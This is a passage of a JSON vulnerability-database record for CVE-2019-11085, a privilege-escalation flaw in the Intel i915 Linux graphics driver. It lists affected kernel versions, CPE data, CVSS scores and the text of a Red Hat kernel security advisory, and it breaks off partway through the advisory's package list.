        "version": "4.15.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.74"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.6"
      },
      {
        "model": "kernel 4.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "i915 graphics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel 3.14-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel 4.3-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.1-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.157"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.135"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.15"
      },
      {
        "model": "kernel 4.1-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 3.15-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel 3.1-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "kernel 4.6-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.11-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.1"
      },
      {
        "model": "kernel 4.11-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.2"
      },
      {
        "model": "kernel 3.11-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.0-28"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "kernel 3.9-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel 3.17-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.68"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.14"
      },
      {
        "model": "kernel 4.15-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel 4.9-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6.3"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.6"
      },
      {
        "model": "kernel 4.5-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 3.5-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel 4.15-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "kernel 4.11-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 3.14-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      },
      {
        "model": "kernel 4.14-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.16-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:i915_firmware:*:*:*:*:*:linux:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "5.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:i915:-:*:*:*:*:linux:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu,Red Hat,Adam \u0027pi3\u0027 Zabrocki.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-11085",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-11085",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-11085",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-11085",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201905-761",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-11085",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Insufficient input validation in Kernel Mode Driver in Intel(R) i915 Graphics for Linux before version 5.0 may allow an authenticated user to potentially enable escalation of privilege via local access. Linux for Intel(R) i915 Graphics Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a local privilege-escalation vulnerability. \nAn attacker can exploit this issue to to gain elevated privileges. \nLinux versions prior to 5.0 are vulnerable. (CVE-2018-13053). 7.5) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* [Hyper-V][RHEL7.6]Hyper-V guest waiting indefinitely for RCU callback\nwhen removing a mem cgroup (BZ#1783175)\n\nEnhancement(s):\n\n* Selective backport: perf: Sync with upstream v4.16 (BZ#1782751)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2019:1873-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:1873\nIssue date:        2019-07-29\nCVE Names:         CVE-2018-16871 CVE-2018-16884 CVE-2019-11085\n                   CVE-2019-11811\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: nfs: use-after-free in svc_process_common() (CVE-2018-16884)\n\n* kernel: insufficient input validation in kernel mode driver in Intel i915\ngraphics leads to privilege escalation (CVE-2019-11085)\n\n* kernel: nfs: NULL pointer dereference due to an anomalized NFS message\nsequence (CVE-2018-16871)\n\n* kernel: use-after-free in drivers/char/ipmi/ipmi_si_intf.c,\nipmi_si_mem_io.c, ipmi_si_port_io.c (CVE-2019-11811)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es) and Enhancement(s):\n\nThese updated kernel packages include also numerous bug fixes and add\nseveral enhancements. Space precludes documenting all of the bug fixes in\nthis advisory. See the descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/4309211\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-957.27.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.27.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm\nperf-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode 